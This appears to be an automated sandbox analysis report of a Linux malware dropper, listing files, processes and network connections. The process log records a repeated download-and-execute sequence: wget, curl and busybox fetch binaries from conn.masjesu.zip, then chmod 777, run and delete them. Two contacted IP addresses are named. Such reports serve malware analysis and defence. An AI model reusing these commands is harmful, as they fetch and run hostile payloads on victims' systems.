| File opened for modification | /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an | /usr/bin/curl | N/A |
| File opened for modification | /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M | /usr/bin/curl | N/A |
| File opened for modification | /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an | /usr/bin/curl | N/A |
| File opened for modification | /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo | /usr/bin/curl | N/A |
Processes
/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh
[/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/bin/chmod
[chmod 777 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5
[./eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/bin/rm
[rm eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/bin/chmod
[chmod 777 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M
[./RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/bin/rm
[rm RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/bin/chmod
[chmod 777 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm
[./WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/bin/rm
[rm WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/bin/chmod
[chmod 777 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an
[./KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/bin/rm
[rm KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/bin/chmod
[chmod 777 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ
[./s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/bin/rm
[rm s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/bin/chmod
[chmod 777 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh
[./alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/bin/rm
[rm alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/bin/chmod
[chmod 777 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC
[./at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/bin/rm
[rm at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/bin/chmod
[chmod 777 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2
[./lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/bin/rm
[rm lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/bin/chmod
[chmod 777 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q
[./YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/bin/rm
[rm YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/bin/chmod
[chmod 777 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB
[./AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/bin/rm
[rm AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/bin/chmod
[chmod 777 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a
[./fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/bin/rm
[rm fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/bin/chmod
[chmod 777 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ
[./K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/bin/rm
[rm K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/bin/chmod
[chmod 777 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo
[./WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/bin/rm
[rm WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/bin/chmod
[chmod 777 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R
[./DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/bin/rm
[rm DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/bin/chmod
[chmod 777 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ
[./s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/bin/rm
[rm s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/bin/chmod
[chmod 777 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh
[./alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/bin/rm
[rm alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/bin/chmod
[chmod 777 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC
[./at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/bin/rm
[rm at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/bin/chmod
[chmod 777 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2
[./lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/bin/rm
[rm lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/bin/chmod
[chmod 777 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q
[./YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/bin/rm
[rm YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/bin/chmod
[chmod 777 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB
[./AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/bin/rm
[rm AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/bin/chmod
[chmod 777 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a
[./fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/bin/rm
[rm fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/bin/chmod
[chmod 777 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ
[./K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/bin/rm
[rm K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/bin/chmod
[chmod 777 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo
[./WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/bin/rm
[rm WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/bin/chmod
[chmod 777 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R
[./DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/bin/rm
[rm DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/bin/chmod
[chmod 777 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5
[./eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/bin/rm
[rm eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/bin/chmod
[chmod 777 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M
[./RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/bin/rm
[rm RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/bin/chmod
[chmod 777 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm
[./WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/bin/rm
[rm WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/bin/chmod
[chmod 777 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an
[./KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/bin/rm
[rm KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
